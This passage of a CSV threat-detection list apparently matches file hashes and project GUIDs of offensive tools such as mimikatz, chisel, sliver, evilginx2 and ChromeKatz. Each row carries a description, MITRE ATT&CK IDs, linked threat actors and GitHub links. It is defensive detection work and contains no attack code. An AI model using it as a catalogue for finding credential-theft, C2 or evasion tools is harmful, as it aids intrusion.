(through the WSC api)","T1089","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/es3n1n/no-defender","1","0","#filehash","N/A","10","10","1907","13","2024-06-08T01:29:18Z","2024-05-23T05:18:38Z","22397" "*17723167fed5ac513f66d4540006dc989d6cf341d43464d241f84daccf889f47*",".{0,1000}17723167fed5ac513f66d4540006dc989d6cf341d43464d241f84daccf889f47.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","0","#filehash","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","22399" "*17808f0e8af07a26a574ab7e9e91ceac220d82f44dbc6c06e20a2afefccec418*",".{0,1000}17808f0e8af07a26a574ab7e9e91ceac220d82f44dbc6c06e20a2afefccec418.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","22400" "*17837e91e3fcfcf19ee77bc80d556e8bf59b411aede445ba030b0f8d0e264b11*",".{0,1000}17837e91e3fcfcf19ee77bc80d556e8bf59b411aede445ba030b0f8d0e264b11.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","22401" "*17893a44c856de700187251711368a3393fa79c92b65d39eb6eb56718a78c255*",".{0,1000}17893a44c856de700187251711368a3393fa79c92b65d39eb6eb56718a78c255.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and 
Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","#filehash","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","22402" "*17914e2d97784ef7aaf52f9f8b04db77cad036308c6b3584fa0fa172ad1da077*",".{0,1000}17914e2d97784ef7aaf52f9f8b04db77cad036308c6b3584fa0fa172ad1da077.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","22404" "*17942ccf0a175f0f4d58db7bc010d0c19c18250e1b634f2aba8d91ba6339d829*",".{0,1000}17942ccf0a175f0f4d58db7bc010d0c19c18250e1b634f2aba8d91ba6339d829.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","22406" "*179c7bc7caed085cdfd1db94e54b75dabb2a8943430be82f590143f2b4303b5d*",".{0,1000}179c7bc7caed085cdfd1db94e54b75dabb2a8943430be82f590143f2b4303b5d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","22408" "*179fff5afdfa8e25f3027ed01a226cb8f0b6ebee516ea2fb8f4e6e226235fe61*",".{0,1000}179fff5afdfa8e25f3027ed01a226cb8f0b6ebee516ea2fb8f4e6e226235fe61.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","22409" "*17a1d963e1565ecff5794a685188f34adc40bc12b4f31aa32db53b6956369827*",".{0,1000}17a1d963e1565ecff5794a685188f34adc40bc12b4f31aa32db53b6956369827.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","#filehash","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","22410" 
"*17a1d963e1565ecff5794a685188f34adc40bc12b4f31aa32db53b6956369827*",".{0,1000}17a1d963e1565ecff5794a685188f34adc40bc12b4f31aa32db53b6956369827.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","#filehash","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","22411" "*17a96dd3f358c5b165d40422c6e218c1b3e9d27182e5202b8d0ad611a874c6d8*",".{0,1000}17a96dd3f358c5b165d40422c6e218c1b3e9d27182e5202b8d0ad611a874c6d8.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","22413" "*17b096ff5df1b612abc12887e65fae97280533bfe058ce6becb9c0920f4d4c42*",".{0,1000}17b096ff5df1b612abc12887e65fae97280533bfe058ce6becb9c0920f4d4c42.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","22414" 
"*17bfe2c77e35c8496b0bbde81bc8d3f5831f0b7f9a4be342a499342a6030fd3e*",".{0,1000}17bfe2c77e35c8496b0bbde81bc8d3f5831f0b7f9a4be342a499342a6030fd3e.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","22415" "*17c3e93b910bc4a48b09772e49f98d877dd870cf81a66697a8d24896bd6a8525*",".{0,1000}17c3e93b910bc4a48b09772e49f98d877dd870cf81a66697a8d24896bd6a8525.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","#filehash","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","22416" "*17c49fde584e67f0cde80e74bdf31d3b7bdfdbef16a93ed41aa6fcc593fed2b2*",".{0,1000}17c49fde584e67f0cde80e74bdf31d3b7bdfdbef16a93ed41aa6fcc593fed2b2.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","22417" "*17c82e0a4054f13739f057fbfa1dabfaf6ca373edc46e345d8e5553dfff3dd7d*",".{0,1000}17c82e0a4054f13739f057fbfa1dabfaf6ca373edc46e345d8e5553dfff3dd7d.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","22419" "*17d97bd15502bc16353e7e06822578069c1e653b031fb4ac982d8cea9d31026f*",".{0,1000}17d97bd15502bc16353e7e06822578069c1e653b031fb4ac982d8cea9d31026f.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","22420" "*17eb30ef4d91991b265d5d93ab7f4ad6b58d43061a46ba3292142b962be95f7d*",".{0,1000}17eb30ef4d91991b265d5d93ab7f4ad6b58d43061a46ba3292142b962be95f7d.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","22423" "*17ed9f14af38a0b8442ea9306ba6746746a3d18c2a45ff1647603a95bd4425c8*",".{0,1000}17ed9f14af38a0b8442ea9306ba6746746a3d18c2a45ff1647603a95bd4425c8.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","22424" "*17fb52476016677db5a93505c4a1c356984bc1f6a4456870f920ac90a7846180*",".{0,1000}17fb52476016677db5a93505c4a1c356984bc1f6a4456870f920ac90a7846180.{0,1000}","offensive_tool_keyword","netpass","When you connect to a network share on your LAN or to your .NET Passport account. Windows allows you to save your password in order to use it in each time that you connect the remote server. This utility recovers all network passwords stored on your system for the current logged-on user. It can also recover the passwords stored in Credentials file of external drive. as long as you know the last log-on password.","T1081 - T1003 - T1555","TA0006 - TA0009","N/A","Kimsuky - XDSpy - TRAVELING SPIDER","Credential Access","https://www.nirsoft.net/utils/network_password_recovery.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","22426" "*17fb52476016677db5a93505c4a1c356984bc1f6a4456870f920ac90a7846180*",".{0,1000}17fb52476016677db5a93505c4a1c356984bc1f6a4456870f920ac90a7846180.{0,1000}","offensive_tool_keyword","netpass","When you connect to a network share on your LAN or to your .NET Passport account. Windows allows you to save your password in order to use it in each time that you connect the remote server. 
This utility recovers all network passwords stored on your system for the current logged-on user. It can also recover the passwords stored in Credentials file of external drive. as long as you know the last log-on password.","T1081 - T1003 - T1555","TA0006 - TA0009","N/A","Kimsuky - XDSpy - TRAVELING SPIDER","Credential Access","https://www.nirsoft.net/utils/network_password_recovery.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","22427" "*17FC11E9-C258-4B8D-8D07-2F4125156244*",".{0,1000}17FC11E9\-C258\-4B8D\-8D07\-2F4125156244.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz UUID","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#GUIDproject","uuid","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","22428" "*17fdfc23e6c0f62068cef7a3ab80f40ab5e4d1b9f6b75d983260ee02fd969c6b*",".{0,1000}17fdfc23e6c0f62068cef7a3ab80f40ab5e4d1b9f6b75d983260ee02fd969c6b.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - 
T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22430" "*17ff8cdd3a77ef0f0106b2b0d8e639f3424ec597c4853a53ebe25433b679707c*",".{0,1000}17ff8cdd3a77ef0f0106b2b0d8e639f3424ec597c4853a53ebe25433b679707c.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems","T1071.002 - T1105 - T1090.001","TA0011","N/A","N/A","C2","https://github.com/PhrozenIO/SharpFtpC2","1","0","#filehash","N/A","10","10","88","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z","22431" "*1812fedbe3078c546fb0b59bd0d1ef35110969a49515f3c7fd1a519469d01104*",".{0,1000}1812fedbe3078c546fb0b59bd0d1ef35110969a49515f3c7fd1a519469d01104.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","22432" "*181de17b8aa7917df5d9e610cf2b183d92d84ec9fe4b809303842bd47022e49c*",".{0,1000}181de17b8aa7917df5d9e610cf2b183d92d84ec9fe4b809303842bd47022e49c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","22434" 
"*18229920a45130f00539405fecab500d8010ef93856e1c5bcabf5aa5532b3311*",".{0,1000}18229920a45130f00539405fecab500d8010ef93856e1c5bcabf5aa5532b3311.{0,1000}","offensive_tool_keyword","RouterScan","a penetration testing tool to maliciously scan for and brute force routers - cameras and network-attached storage devices with web interfaces","T1110","TA0006 - TA0007","RouterScan","Conti","Credential Access","https://github.com/mustafashykh/router-scan","1","0","#filehash","N/A","8","1","83","44","2019-02-24T14:31:16Z","2019-02-24T07:52:22Z","22435" "*1824ED63-BE4D-4306-919D-9C749C1AE271*",".{0,1000}1824ED63\-BE4D\-4306\-919D\-9C749C1AE271.{0,1000}","offensive_tool_keyword","SharpDecryptPwd","Decrypt Navicat,Xmanager,Filezilla,Foxmail,WinSCP,etc","T1003.008 - T1555.004 - T1552.002","TA0006","N/A","N/A","Credential Access","https://github.com/RowTeam/SharpDecryptPwd","1","0","#GUIDproject","N/A","10","8","769","117","2022-03-04T02:49:31Z","2022-02-25T11:21:43Z","22436" "*18267a8ff015b5b2e236f8c77a83c6671a651ea1c764f0e1b021aedf33154f83*",".{0,1000}18267a8ff015b5b2e236f8c77a83c6671a651ea1c764f0e1b021aedf33154f83.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22437" "*1827f84465eaa41ba584561ae108be14e693ba4c992e9d58ef0148959cc9efc1*",".{0,1000}1827f84465eaa41ba584561ae108be14e693ba4c992e9d58ef0148959cc9efc1.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - 
COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","22438" "*182e514745c25c47038513979fa80e3744d792f121089cffce1f5de3c5799202*",".{0,1000}182e514745c25c47038513979fa80e3744d792f121089cffce1f5de3c5799202.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","22440" "*182e81c156f653dea62d0aaa97c23887cf99907e16503654bc1fb55405073903*",".{0,1000}182e81c156f653dea62d0aaa97c23887cf99907e16503654bc1fb55405073903.{0,1000}","offensive_tool_keyword","PrivFu","ArtsOfGetSystem privesc tools","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","#filehash","ArtsOfGetSystem","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","22441" "*1830c05bde7c4d7b795968d4e3c25ecb3dd98763662b1d85fd4abfbbf8e5b660*",".{0,1000}1830c05bde7c4d7b795968d4e3c25ecb3dd98763662b1d85fd4abfbbf8e5b660.{0,1000}","offensive_tool_keyword","Browser Data Grabber","credential access tool used by the Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential Access","https://github.com/n37sn4k3/BrowserDataGrabber","1","0","#filehash","N/A","10","1","7","4","2018-05-28T15:49:03Z","2018-05-04T12:33:32Z","22442" 
"*183c3aa2fd81b6e9b3af4f376d96f57ab6557009d8abe5c6f849f4bb2a0111a9*",".{0,1000}183c3aa2fd81b6e9b3af4f376d96f57ab6557009d8abe5c6f849f4bb2a0111a9.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22444" "*18425e36ae11253b1bfe0a4cd5a291f33709e3199d7598a39fa91efa4b8d70b8*",".{0,1000}18425e36ae11253b1bfe0a4cd5a291f33709e3199d7598a39fa91efa4b8d70b8.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","22446" "*184c81c9d2a54ae16baadb6f6523e4ae2060c6570682a721f3d977dccfd68a64*",".{0,1000}184c81c9d2a54ae16baadb6f6523e4ae2060c6570682a721f3d977dccfd68a64.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","22451" "*1852b51d64caeda03dba3856a6f691fb80f5a240946fd968d1978f41e7f56fc1*",".{0,1000}1852b51d64caeda03dba3856a6f691fb80f5a240946fd968d1978f41e7f56fc1.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & 
Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","22452" "*185ba9d99a4aea0e2f40bd6b6b089ea81c892929fcc91547e2042d180946f320*",".{0,1000}185ba9d99a4aea0e2f40bd6b6b089ea81c892929fcc91547e2042d180946f320.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22454" "*185d6eb2bb3eeef1bc1737f766942e215342c864bdfd6132c2d55f22a5a10d61*",".{0,1000}185d6eb2bb3eeef1bc1737f766942e215342c864bdfd6132c2d55f22a5a10d61.{0,1000}","offensive_tool_keyword","HTTP-Shell","MultiPlatform HTTP Reverse Shell","T1573.001 - T1104 - T1205 - T1110","TA0005 - TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/HTTP-Shell","1","0","#filehash","N/A","10","10","231","33","2024-09-27T10:23:14Z","2023-09-05T12:01:17Z","22455" "*186789b7b7c4973d4f941582a796c3ced5ae7fbc4527cf19040e740d380c4106*",".{0,1000}186789b7b7c4973d4f941582a796c3ced5ae7fbc4527cf19040e740d380c4106.{0,1000}","offensive_tool_keyword","Stifle",".NET Post-Exploitation Utility for Abusing Explicit Certificate Mappings in ADCS","T1550.003 - T1552.004 - T1606.002","TA0006 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/logangoins/Stifle","1","0","#filehash","N/A","7","2","140","9","2025-02-10T04:58:46Z","2025-02-08T06:13:43Z","22457" "*1868f166b2b622a3fd8bcb7003527e32700d222d5a8275da4479d04ec991e54c*",".{0,1000}1868f166b2b622a3fd8bcb7003527e32700d222d5a8275da4479d04ec991e54c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - 
AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","22458" "*186b93ae9e55f25fd6f409914f4e40ef85b92e0bec374fecd8ee293dfd362387*",".{0,1000}186b93ae9e55f25fd6f409914f4e40ef85b92e0bec374fecd8ee293dfd362387.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","22459" "*187622b4abcd679d2a8b74ba1ea8cec9d517a4026fc58ea7c33ff13ad5c1ca88*",".{0,1000}187622b4abcd679d2a8b74ba1ea8cec9d517a4026fc58ea7c33ff13ad5c1ca88.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","0","#filehash","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","22461" "*1877E0EC0E657212BF5C9C9170427F7B4D8FDCBED8CFE8FAC388827CE33FDADD*",".{0,1000}1877E0EC0E657212BF5C9C9170427F7B4D8FDCBED8CFE8FAC388827CE33FDADD.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wrapped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","22462" "*18800661d2b7b1a4c35b64142ba7dc1aee0268a0b6327be86dd9434539e7c53e*",".{0,1000}18800661d2b7b1a4c35b64142ba7dc1aee0268a0b6327be86dd9434539e7c53e.{0,1000}","offensive_tool_keyword","sharphound","C#
Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","22463" "*1881deb76eaaf35b1bd0f5c5545cd49b281f3d592610df17417dbd2f071d229b*",".{0,1000}1881deb76eaaf35b1bd0f5c5545cd49b281f3d592610df17417dbd2f071d229b.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","22464" "*18841fe957995a34a5b74eb0a894cad7ee2c10d1c33f1955c1623279e81b9343*",".{0,1000}18841fe957995a34a5b74eb0a894cad7ee2c10d1c33f1955c1623279e81b9343.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","22465" 